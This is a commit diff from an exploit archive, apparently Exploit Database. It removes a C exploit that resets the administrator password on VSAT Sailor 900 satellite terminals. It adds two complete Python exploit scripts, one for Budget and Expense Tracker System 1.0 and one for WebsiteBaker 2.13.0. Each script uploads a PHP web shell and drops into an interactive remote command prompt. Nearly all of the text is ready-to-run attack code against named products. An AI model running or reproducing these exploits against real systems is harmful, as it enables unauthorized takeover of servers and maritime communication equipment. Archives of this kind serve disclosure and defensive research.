DB: 2021-09-22
5 changes to exploits/shellcodes Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial-Of-Service (PoC) VSAT Sailor 900 - Remote Overflow Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)
This commit is contained in:
Offensive Security
parent
5cc446a25f
commit
1148d69c62
5 changed files with 722 additions and 255 deletions
|
|
@ -1,254 +0,0 @@
|
|||
/*
|
||||
** File : satcompwn.c - [VSAT SAILOR SAT COM 900 Remote 0day]
|
||||
** Author : Nicholas Lemonias
|
||||
**
|
||||
** This is proprietary source code material of Advanced Information Security Corporation.
|
||||
** Usage, distribution and modifications are pursuant to our terms of agreement.
|
||||
**
|
||||
**
|
||||
** Copyright (c) 2009-2014, Advanced Information Security Corporation as represented by the
|
||||
** author of this software.
|
||||
** All rights reserved.
|
||||
**
|
||||
**
|
||||
** This research demo is for academic research purposes ONLY. You may only use this software for
|
||||
** educational purposes, or for the purpose of academic research.
|
||||
** This work is copyright protected. You may not, copy, or distribute
|
||||
** or use this in any other way, without prior authorisation. This work is covered by DMCA and
|
||||
** other applicable intellectual property laws.
|
||||
**
|
||||
** #@#@~ VSAT SAILOR 900 / SATCOM (iDirect/Linux)
|
||||
**
|
||||
** Poc Tested on our: iDirect Infiniti VMU/SATCOM v.1.47 Build 9
|
||||
** Platform Frequency: Ku/Ka band
|
||||
** Compatible Networks: Jabiru, Inmarsat GX, and Intelsat's Epic
|
||||
**
|
||||
*/
|
||||
|
||||
/****************************************************************************************
|
||||
(c) 2014 Advanced Information Security Corporation
|
||||
*****************************************************************************************/
|
||||
|
||||
|
||||
/*
|
||||
** Compilation: cc satcompwn.c -o satcompwn
|
||||
** HOW-TO:
|
||||
**
|
||||
** Usage: ./satcompwn <host> <port>\n
|
||||
**
|
||||
**
|
||||
*/
|
||||
|
||||
|
||||
#include <netinet/in.h>
|
||||
#include <signal.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/wait.h>
|
||||
#include <netdb.h>
|
||||
#include <unistd.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <assert.h>
|
||||
#include <errno.h>
|
||||
#include <time.h>
|
||||
#include <fcntl.h>
|
||||
#include <sys/time.h>
|
||||
#include <sys/socket.h>
|
||||
|
||||
#define BUFFER_MAX_SIZE 65535
|
||||
#define BUFFER_MIN_LEN 230
|
||||
|
||||
ssize_t payload(int sock, char *hst, char *pg, char *pss)
|
||||
{
|
||||
char BUF_SIZE_S[BUFFER_MAX_SIZE + 1], BUF_SIZE_R[BUFFER_MAX_SIZE + 1];
|
||||
ssize_t n; char *l;
|
||||
|
||||
snprintf(BUF_SIZE_S, BUFFER_MIN_LEN,
|
||||
"POST %s HTTP/1.0\n\n"
|
||||
"Host: %s\r\n"
|
||||
"Content-type: application/x-www-form-urlencoded\r\n"
|
||||
"Content-length: %zu \r\n"
|
||||
"Cookie: tt_adm=694020\r\n"
|
||||
"%s \r\n\n", pg, hst, strlen(pss), pss);
|
||||
|
||||
if(write(sock,BUF_SIZE_S, strlen(BUF_SIZE_S)) == -1) {
|
||||
error("Read error");
|
||||
return -1;
|
||||
}
|
||||
printf("\n");
|
||||
printf("Sending Payload.....\n");
|
||||
|
||||
printf("\n\n");
|
||||
printf("%s", BUF_SIZE_S, sizeof(BUF_SIZE_S));
|
||||
|
||||
|
||||
while ((n =read(sock,BUF_SIZE_R,sizeof(BUF_SIZE_R))) > 0){
|
||||
BUF_SIZE_R[n] = '\0';
|
||||
|
||||
if(n == -1) {
|
||||
error("Read error");
|
||||
return -1;
|
||||
}
|
||||
|
||||
|
||||
|
||||
if ( strstr(BUF_SIZE_R, "404")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.5 - False Positive HTTP ERROR [404] Host is not a V-SAT Sailor 900 terminal.\n\n\n");
|
||||
if ( strstr(BUF_SIZE_R, "401")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.2 - HTTP Unauthorized [401] Unauthorized Access to remote host.\n\n\n");
|
||||
if ( strstr(BUF_SIZE_R, "500")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.5.1 - HTTP Internal Server Error [500] Internal Server Error - The remote host couldn't recognise the request. This is not a valid SAILOR 900 terminal.\n\n\n");
|
||||
if ( strstr(BUF_SIZE_R, "303")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.3.4 - HTTP See Other [303] Possible Redirect - The code received says it is temporary under a different URL. This is not a valid SAILOR 900 terminal.\n\n\n");
|
||||
if ( strstr(BUF_SIZE_R, "307")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.3.8 - HTTP Temporary Redirect [307] Possible Redirect - The requested resource received indicates redirection. This is not a valid SAILOR 900 terminal.\n\n\n");
|
||||
if ( strstr(BUF_SIZE_R, "403")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.4 - HTTP Forbidden [403] The remote server/ understood the request, but is refusing to fulfill it.\n\n\n");
|
||||
if ( strstr(BUF_SIZE_R, "407")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.8 - HTTP Proxy Authentication Required [407] - The remote terminal requires HTTP authentication. If this is a valid SAILOR 900 terminal, it is protected with HTTP authentication.\n\n\n");
|
||||
if ( strstr(BUF_SIZE_R, "408")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.9 - HTTP Request Time out [408] - The client did not produce a request within the time that the server was prepared to wait.\n\n\n");
|
||||
if ( strstr(BUF_SIZE_R, "503")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.5.4 - HTTP Service Unavailable [503] - Connection Refused. The hostname of the terminal provided is currently unable to handle the request.\n\n\n");
|
||||
if ( strstr(BUF_SIZE_R, "411")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 411 - Length Required. This is not a valid SAILOR 900 terminal.\n\n\n");
|
||||
if ( strstr(BUF_SIZE_R, "400")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 400 - Bad Request. This is not a valid SAILOR 900 terminal. The request could not be understood by the remote server.\n\n\n");
|
||||
if ( strstr(BUF_SIZE_R, "301")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 301 - Moved Permanently. This is not a valid SAILOR 900 terminal. The request could not be understood by the remote server.\n\n\n");
|
||||
if ( strstr(BUF_SIZE_R, "BAD REQUEST")) printf("\n\n[x] Exploit Failed. This is not a valid SAILOR 900 terminal.\n\n\n");
|
||||
|
||||
if ( strstr(BUF_SIZE_R, "202")) {
|
||||
|
||||
while ( (l=strstr(BUF_SIZE_R,"Thrane & Thrane")) == NULL ) printf("\n\n[x] Exploit Failed. This is not a valid SAILOR 900 terminal...\n\n\n"); }
|
||||
|
||||
else if (strstr(BUF_SIZE_R, "Thrane & Thrane") != NULL && strstr(BUF_SIZE_R, "302") == NULL){
|
||||
printf("[x] Mission Successful Ref. RFC 2616, 10.2.3 - HTTP Okay [202] The remote host is a V-SAT Sailor 900. Please Login as administrator: user:admin & pass:aisatpwn2134 on %s\n\n\n", hst);
|
||||
}
|
||||
}
|
||||
printf("***********************************************************************\n");
|
||||
printf("*Advanced Information Security Corporation, 2014 - All Rights Reserved*\n");
|
||||
printf("***********************************************************************\n");
|
||||
printf("* Please wait.. I will provide you with some more information below:\n");
|
||||
printf("***********************************************************************\n");
|
||||
printf("\n\n\n\n");
|
||||
printf("%s \n\n", BUF_SIZE_R, sizeof(BUF_SIZE_R));
|
||||
|
||||
return n;
|
||||
|
||||
}
|
||||
|
||||
int main (int argc, char *argv[]) {
|
||||
|
||||
|
||||
char *pg = "/index.lua?pageID=administration";
|
||||
char *pss = "&usernameAdmChange=admin"
|
||||
"&passwordAdmChange=aisatpwn2134";
|
||||
|
||||
// char *cval = "tt_adm=tt_adm=694020";
|
||||
|
||||
long arg;
|
||||
int sock, opt, evalopt, s;
|
||||
|
||||
|
||||
if(argc < 2)
|
||||
{
|
||||
printf("***********************************************************************\n");
|
||||
printf("(Advanced Information Security Corporation, 2014 - All Rights Reserved*\n");
|
||||
printf("***********************************************************************\n");
|
||||
printf("* *\n");
|
||||
printf("* (V-SAT SAILOR 900 Remote Exploit) *\n");
|
||||
printf("***********************************************************************\n");
|
||||
printf("* Disclaimer: This is proprietary source code material of Advanced *\n");
|
||||
printf("* Information Security Corporation. This software is for *\n");
|
||||
printf("* research purposes only. *\n");
|
||||
printf("***********************************************************************\n");
|
||||
printf("* VSAT Sailor 900 / Tested on iDirect Infiniti VMU v.1.47 Build 9 *\n");
|
||||
printf("* Description: *\n");
|
||||
printf("* The Sailor 900 VSAT is an advanced maritime stabilised Ku/Ka band *\n");
|
||||
printf("* platform with integrated GPS, compatible with a number of satellite *\n");
|
||||
printf("* networks, such as Jabiru, Inmarsat GX, and Intelsat's Epic. *\n");
|
||||
printf("***********************************************************************\n");
|
||||
printf("\n\n");
|
||||
fprintf(stderr, " Main Menu \n");
|
||||
fprintf(stderr, " Usage: %s <host> <port>\n", argv[0]);
|
||||
exit(1);
|
||||
}
|
||||
struct timeval tv;
|
||||
struct sockaddr_in remote;
|
||||
struct hostent *host;
|
||||
socklen_t lon;
|
||||
|
||||
|
||||
host = gethostbyname((void *)argv[1]);
|
||||
|
||||
fd_set wset;
|
||||
fd_set rset;
|
||||
|
||||
sock = socket(AF_INET,SOCK_STREAM,0);
|
||||
remote.sin_port = htons(atoi(argv[2]));
|
||||
remote.sin_addr.s_addr = htonl(INADDR_ANY);
|
||||
remote.sin_addr.s_addr = ((struct in_addr *)(host->h_addr))->s_addr;
|
||||
remote.sin_family = AF_INET;
|
||||
memset(remote.sin_zero,0,sizeof(remote.sin_zero));
|
||||
fflush(stdout);
|
||||
|
||||
|
||||
if (sock == -1) {
|
||||
perror("socket creation error");
|
||||
return -1;
|
||||
}
|
||||
FD_ZERO( &wset );
|
||||
FD_SET( sock , &wset );
|
||||
|
||||
FD_ZERO( &rset );
|
||||
FD_SET( sock , &rset );
|
||||
|
||||
tv.tv_sec = 3;
|
||||
tv.tv_usec = 0;
|
||||
|
||||
|
||||
s = connect(sock,(struct sockaddr *)&remote,sizeof(struct sockaddr));
|
||||
if (s == -1 ) {
|
||||
perror("connection ");
|
||||
return -1;}
|
||||
|
||||
if( errno != 0) {
|
||||
perror("connection ");
|
||||
return -1;
|
||||
}
|
||||
|
||||
arg = fcntl(sock, F_GETFL, NULL);
|
||||
arg |= O_NONBLOCK;
|
||||
fcntl(sock, F_SETFL, arg);
|
||||
if( fcntl( sock , F_SETFL , O_NONBLOCK ) == -1 ) {
|
||||
perror("fcntl error");
|
||||
return -1;
|
||||
}
|
||||
|
||||
opt = select(sock+1,NULL,&wset,NULL,&tv);
|
||||
|
||||
if( opt == -1 ) {
|
||||
perror("select");
|
||||
return -1;
|
||||
}
|
||||
if (opt > 0) {
|
||||
lon = sizeof(int);
|
||||
getsockopt(sock, SOL_SOCKET, SO_ERROR, (void*)(&evalopt), &lon);
|
||||
|
||||
if (evalopt) {
|
||||
fprintf(stderr, "Socket Connection Error Code at: %d - %s\n", evalopt, strerror(evalopt));
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
||||
if( fcntl( sock , F_SETFL , 0 ) == -1 ) {
|
||||
perror("fcntl");
|
||||
printf("[RST-FCNTL] FCNTL Error. Exiting the software.\n\n");
|
||||
return -1;
|
||||
}
|
||||
|
||||
|
||||
if( payload(sock,host->h_name,pg,pss) != 1) printf("\n\n[x] Payload Sent. Please check server responses above to verify status.\n\n");
|
||||
|
||||
|
||||
arg = fcntl(sock, F_GETFL, NULL);
|
||||
arg &= (~O_NONBLOCK);
|
||||
fcntl(sock, F_SETFL, arg);
|
||||
|
||||
close(sock);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
}
|
||||
129
exploits/php/webapps/50308.txt
Normal file
129
exploits/php/webapps/50308.txt
Normal file
|
|
@ -0,0 +1,129 @@
|
|||
# Exploit Title: Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
|
||||
# Exploit Author: Abdullah Khawaja (hax.3xploit)
|
||||
# Date: 2021-09-21
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
|
||||
# Version: 2.0
|
||||
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
|
||||
# Description: Budget and Expense Tracker System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
|
||||
|
||||
|
||||
|
||||
# RCE via executing exploit:
|
||||
# Step 1: run the exploit in python with this command: python3 BMAETS_v1.0.py
|
||||
# Step 2: Input the URL of the vulnerable application: Example: http://localhost/expense_budget/
|
||||
|
||||
|
||||
import requests, sys, urllib, re
|
||||
import datetime
|
||||
from colorama import Fore, Back, Style
|
||||
|
||||
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
|
||||
|
||||
print(Style.BRIGHT+" Budget and Expense Tracker System 1.0")
|
||||
print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)
|
||||
print(header)
|
||||
|
||||
print(r"""
|
||||
______ _______ ________
|
||||
___ //_/__ /_______ ___ _______ ______(_)_____ _
|
||||
__ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/
|
||||
_ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ /
|
||||
/_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/
|
||||
/___/
|
||||
abdullahkhawaja.com
|
||||
""")
|
||||
|
||||
|
||||
|
||||
GREEN = '\033[32m' # Green Text
|
||||
RED = '\033[31m' # Red Text
|
||||
RESET = '\033[m' # reset to the defaults
|
||||
|
||||
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
|
||||
|
||||
|
||||
#Create a new session
|
||||
s = requests.Session()
|
||||
|
||||
|
||||
#Set Cookie
|
||||
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
|
||||
|
||||
LINK=input("Enter URL of The Vulnarable Application : ")
|
||||
|
||||
|
||||
def webshell(LINK, session):
|
||||
try:
|
||||
WEB_SHELL = LINK+'/uploads/'+filename
|
||||
getdir = {'cmd': 'echo %CD%'}
|
||||
r2 = session.get(WEB_SHELL, params=getdir, verify=False, proxies=proxies)
|
||||
status = r2.status_code
|
||||
if status != 200:
|
||||
print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
|
||||
r2.raise_for_status()
|
||||
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
|
||||
cwd = re.findall('[CDEF].*', r2.text)
|
||||
cwd = cwd[0]+"> "
|
||||
term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
|
||||
while True:
|
||||
thought = input(term)
|
||||
command = {'cmd': thought}
|
||||
r2 = requests.get(WEB_SHELL, params=command, verify=False)
|
||||
status = r2.status_code
|
||||
if status != 200:
|
||||
r2.raise_for_status()
|
||||
response2 = r2.text
|
||||
print(response2)
|
||||
except:
|
||||
print("\r\nExiting.")
|
||||
sys.exit(-1)
|
||||
|
||||
|
||||
#Creating a PHP Web Shell
|
||||
|
||||
phpshell = {
|
||||
'img':
|
||||
(
|
||||
'shell.php',
|
||||
'<?php echo shell_exec($_REQUEST["cmd"]); ?>',
|
||||
'application/octet-stream',
|
||||
{'Content-Disposition': 'form-data'}
|
||||
)
|
||||
}
|
||||
|
||||
# Defining value for form data
|
||||
data = {'name':'Budget and Expense Tracker System - PHP', 'short_name':'B&E Tracker'}
|
||||
|
||||
|
||||
def id_generator():
|
||||
x = datetime.datetime.now()
|
||||
date_string = x.strftime("%y-%m-%d %H:%M")
|
||||
date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
|
||||
timestamp = datetime.datetime.timestamp(date)
|
||||
file = int(timestamp)
|
||||
final_name = str(file)+'_shell.php'
|
||||
return final_name
|
||||
|
||||
filename = id_generator()
|
||||
#Uploading Reverse Shell
|
||||
print("[*]Uploading PHP Shell For RCE...")
|
||||
upload = s.post(LINK+'classes/SystemSettings.php?f=update_settings', cookies=cookies, files=phpshell, data=data, proxies=proxies)
|
||||
|
||||
shell_upload = True if("1" in upload.text) else False
|
||||
u=shell_upload
|
||||
if u:
|
||||
print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
|
||||
else:
|
||||
print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
|
||||
|
||||
|
||||
|
||||
#Executing The Webshell
|
||||
webshell(LINK, s)
|
||||
290
exploits/php/webapps/50310.py
Executable file
290
exploits/php/webapps/50310.py
Executable file
|
|
@ -0,0 +1,290 @@
|
|||
# Exploit Title: WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)
|
||||
# Date: 18-09-2021
|
||||
# Exploit Author: Halit AKAYDIN (hLtAkydn)
|
||||
# Vendor Homepage: https://websitebaker.org/
|
||||
# Software Link: http://wiki.websitebaker.org/doku.php/en/downloads
|
||||
# Version: 2.13.0
|
||||
# Category: Webapps
|
||||
# Tested on: Linux/Windows
|
||||
|
||||
# WebsiteBaker Open Source Content Management
|
||||
# Includes an endpoint that allows remote access
|
||||
# Language page misconfigured, causing vulnerability
|
||||
# User information with sufficient permissions is required.
|
||||
# I had to write a long script to bypass some security measures.
|
||||
|
||||
# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
|
||||
# python3 exploit.py -h
|
||||
|
||||
|
||||
from bs4 import BeautifulSoup
|
||||
from time import sleep
|
||||
import requests
|
||||
import argparse
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(
|
||||
description='WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)'
|
||||
)
|
||||
parser.add_argument('-u', '--host', type=str, required=True)
|
||||
parser.add_argument('-l', '--login', type=str, required=True)
|
||||
parser.add_argument('-p', '--password', type=str, required=True)
|
||||
args = parser.parse_args()
|
||||
print("\nWebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)",
|
||||
"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
|
||||
sleep(2)
|
||||
find_default(args)
|
||||
|
||||
|
||||
|
||||
def find_default(args):
|
||||
#Check http or https
|
||||
if args.host.startswith(('http://', 'https://')):
|
||||
print("[?] Check Url...\n")
|
||||
args.host = args.host
|
||||
if args.host.endswith('/'):
|
||||
args.host = args.host[:-1]
|
||||
sleep(2)
|
||||
else:
|
||||
print("\n[?] Check Adress...\n")
|
||||
args.host = "http://" + args.host
|
||||
args.host = args.host
|
||||
if args.host.endswith('/'):
|
||||
args.host = args.host[:-1]
|
||||
sleep(2)
|
||||
|
||||
|
||||
# Check Host Status
|
||||
try:
|
||||
response = requests.get(args.host)
|
||||
if response.status_code != 200:
|
||||
print("[-] Address not reachable!\n")
|
||||
sleep(2)
|
||||
exit(1)
|
||||
|
||||
except requests.ConnectionError as exception:
|
||||
print("[-] Address not reachable!\n")
|
||||
sleep(2)
|
||||
exit(1)
|
||||
|
||||
exploit(args)
|
||||
|
||||
url = args.host + "/admin/login/index.php"
|
||||
headers = {
|
||||
"Upgrade-Insecure-Requests": "1",
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||
"Referer": args.host + "/admin/addons/index.php",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept-Language": "en-US,en;q=0.9",
|
||||
"Connection": "close"
|
||||
}
|
||||
response = requests.get(url, headers=headers)
|
||||
for cookie in response.cookies:
|
||||
phpsessid_name = cookie.name
|
||||
|
||||
soup = BeautifulSoup(response.text, 'html.parser')
|
||||
input_hidden_username = (soup.find_all("input", type="hidden")[1].get("value"))
|
||||
input_hidden_password = (soup.find_all("input", type="hidden")[2].get("value"))
|
||||
input_hidden_name = (soup.find_all("input", type="hidden")[3].get("name"))
|
||||
input_hidden_value = (soup.find_all("input", type="hidden")[3].get("value"))
|
||||
|
||||
|
||||
login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value)
|
||||
|
||||
|
||||
|
||||
def login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value):
|
||||
|
||||
session = requests.session()
|
||||
|
||||
url = args.host + "/admin/login/index.php"
|
||||
cookies = {
|
||||
"klaro": "{'klaro':true,'mathCaptcha':true}"
|
||||
}
|
||||
|
||||
headers = {
|
||||
"Cache-Control": "max-age=0",
|
||||
"Upgrade-Insecure-Requests": "1",
|
||||
"Origin": args.host,
|
||||
"Content-Type": "application/x-www-form-urlencoded",
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||
"Referer": args.host + "/admin/login/index.php",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept-Language": "en-US,en;q=0.9", "Connection": "close"
|
||||
}
|
||||
|
||||
data = {
|
||||
"url": '',
|
||||
"username_fieldname": input_hidden_username,
|
||||
"password_fieldname": input_hidden_password,
|
||||
input_hidden_name: input_hidden_value,
|
||||
input_hidden_username : args.login,
|
||||
input_hidden_password : args.password,
|
||||
"submit": ''
|
||||
}
|
||||
|
||||
|
||||
response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
|
||||
new_cookie = (response.cookies.get(phpsessid_name))
|
||||
|
||||
if response.headers.get("Location") == args.host + "/admin/start/index.php":
|
||||
print("[+] Success Login...\n")
|
||||
sleep(2)
|
||||
check_pers(args, phpsessid_name, new_cookie)
|
||||
else:
|
||||
print("[-] Login Failed...\n")
|
||||
print("Your username or password is incorrect.")
|
||||
sleep(2)
|
||||
|
||||
|
||||
def check_pers(args, phpsessid_name, new_cookie):
|
||||
url = args.host + "/admin/languages/install.php"
|
||||
cookies = {
|
||||
"klaro": "{'klaro':true,'mathCaptcha':true}",
|
||||
phpsessid_name : new_cookie
|
||||
}
|
||||
headers = {
|
||||
"Cache-Control": "max-age=0",
|
||||
"Upgrade-Insecure-Requests": "1",
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept-Language": "en-US,en;q=0.9",
|
||||
"Connection": "close"
|
||||
}
|
||||
response = requests.get(url, headers=headers, cookies=cookies)
|
||||
soup = BeautifulSoup(response.text, 'html.parser')
|
||||
|
||||
if (soup.find_all("title")[0].text == "Enter your website title » Administration - Add-ons"):
|
||||
find_token(args, phpsessid_name, new_cookie)
|
||||
else:
|
||||
print("[!] Unauthorized user!\n\n")
|
||||
print("Requires user with language editing permissions.")
|
||||
sleep(2)
|
||||
exit(1)
|
||||
|
||||
|
||||
def find_token(args, phpsessid_name, new_cookie):
|
||||
url = args.host + "/admin/languages/index.php"
|
||||
cookies = {
|
||||
"klaro": "{'klaro':true,'mathCaptcha':true}",
|
||||
phpsessid_name : new_cookie
|
||||
}
|
||||
headers = {
|
||||
"Cache-Control": "max-age=0",
|
||||
"Upgrade-Insecure-Requests": "1",
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept-Language": "en-US,en;q=0.9",
|
||||
"Connection": "close"
|
||||
}
|
||||
response = requests.get(url, headers=headers, cookies=cookies)
|
||||
soup = BeautifulSoup(response.text, 'html.parser')
|
||||
token_hidden_name = soup.find_all("input", type="hidden")[5].get("name")
|
||||
token_hidden_value = soup.find_all("input", type="hidden")[5].get("value")
|
||||
|
||||
|
||||
if soup.find_all("option")[1].text == "":
|
||||
exploit(args)
|
||||
elif soup.find_all("option")[20].text == "Türkçe":
|
||||
token_lang = soup.find_all("option")[20].get("value")
|
||||
uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang)
|
||||
else:
|
||||
install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value)
|
||||
pass
|
||||
|
||||
|
||||
def install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value):
|
||||
url = args.host + "/admin/languages/install.php"
|
||||
cookies = {
|
||||
"klaro": "{'klaro':true,'mathCaptcha':true}",
|
||||
phpsessid_name: new_cookie
|
||||
}
|
||||
|
||||
headers = {
|
||||
"Cache-Control": "max-age=0",
|
||||
"Upgrade-Insecure-Requests": "1",
|
||||
"Origin": args.host,
|
||||
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryCyjXuM2KSAsqjze1",
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||
"Referer": args.host + "/admin/languages/index.php",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept-Language": "en-US,en;q=0.9",
|
||||
"Connection": "close"
|
||||
}
|
||||
|
||||
data = "------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ninstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"advanced\"\r\n\r\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\""+token_hidden_name+"\"\r\n\r\n"+token_hidden_value+"\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"TR.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nInstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"overwrite\"\r\n\r\ntrue\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1--\r\n"
|
||||
response = requests.post(url, headers=headers, cookies=cookies, data=data)
|
||||
soup = BeautifulSoup(response.text, 'html.parser')
|
||||
# print(soup.find_all("div", class_="w3-text-grey w3--medium"))
|
||||
print("[!] Installing Vuln Lang File!\n")
|
||||
sleep(2)
|
||||
find_token(args, phpsessid_name, new_cookie)
|
||||
|
||||
|
||||
|
||||
def uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang):
|
||||
|
||||
url = args.host + "/admin/languages/uninstall.php"
|
||||
cookies = {
|
||||
"klaro": "{'klaro':true,'mathCaptcha':true}",
|
||||
phpsessid_name: new_cookie
|
||||
}
|
||||
headers = {
|
||||
"Cache-Control": "max-age=0",
|
||||
"Upgrade-Insecure-Requests": "1",
|
||||
"Origin": args.host,
|
||||
"Content-Type": "application/x-www-form-urlencoded",
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||
"Referer": args.host + "/admin/languages/index.php",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept-Language": "en-US,en;q=0.9",
|
||||
"Connection": "close"
|
||||
}
|
||||
data = {
|
||||
"action": "uninstall",
|
||||
"advanced": '',
|
||||
token_hidden_name : token_hidden_value,
|
||||
"file": token_lang,
|
||||
"submit": "Uninstall"
|
||||
}
|
||||
response = requests.post(url, headers=headers, cookies=cookies, data=data)
|
||||
soup = BeautifulSoup(response.text, 'html.parser')
|
||||
print("[!] Uninstall Lang File!\n")
|
||||
# print(soup.find_all("div", class_="w3-text-grey w3--medium"))
|
||||
sleep(2)
|
||||
find_token(args, phpsessid_name, new_cookie)
|
||||
|
||||
|
||||
|
||||
def exploit(args):
|
||||
response = requests.get(args.host + "/languages/TR.php?cmd=whoami")
|
||||
if response.status_code == 200:
|
||||
print("[*] Exploit File Exists!\n")
|
||||
sleep(2)
|
||||
print("[+] Exploit Done!\n")
|
||||
sleep(2)
|
||||
|
||||
while True:
|
||||
cmd = input("$ ")
|
||||
url = args.host + "/languages/TR.php?cmd=" + cmd
|
||||
headers = {
|
||||
"Upgrade-Insecure-Requests": "1",
